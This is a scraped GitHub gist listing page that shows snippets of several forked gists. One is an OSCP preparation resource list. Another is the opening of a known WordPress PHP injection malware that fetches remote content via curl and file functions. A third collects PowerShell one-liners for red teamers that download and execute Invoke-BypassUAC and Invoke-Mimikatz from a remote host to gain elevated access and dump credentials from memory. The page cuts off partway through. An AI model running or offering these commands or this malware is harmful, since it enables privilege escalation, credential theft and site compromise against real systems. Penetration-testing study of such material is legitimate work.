Skip to content

Instantly share code, notes, and snippets.

@handyteddy
handyteddy / oscp_prep.md
Created April 14, 2021 14:21 — forked from sankhyans/oscp_prep.md
Resource for OSCP like HTB Boxes with Ippsec Videos and Writeups.
@handyteddy
handyteddy / gist:7689e2fe51b15540b3a96cc07310c181
Created April 10, 2021 23:33 — forked from amster/gist:1964927
WordPress PHP hack, a.k.a. eval(base64_decode('aWYoZ...
if (function_exists('ob_start') && !isset($_SERVER['mr_no'])) {
$_SERVER['mr_no'] = 1;
if (!function_exists('mrobh')) {
function get_tds_777($url) {
$content = "";
$content = @trycurl_777($url);
if ($content !== false) return $content;
$content = @tryfile_777($url);
if ($content !== false) return $content;
$content = @tryfopen_777($url);
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands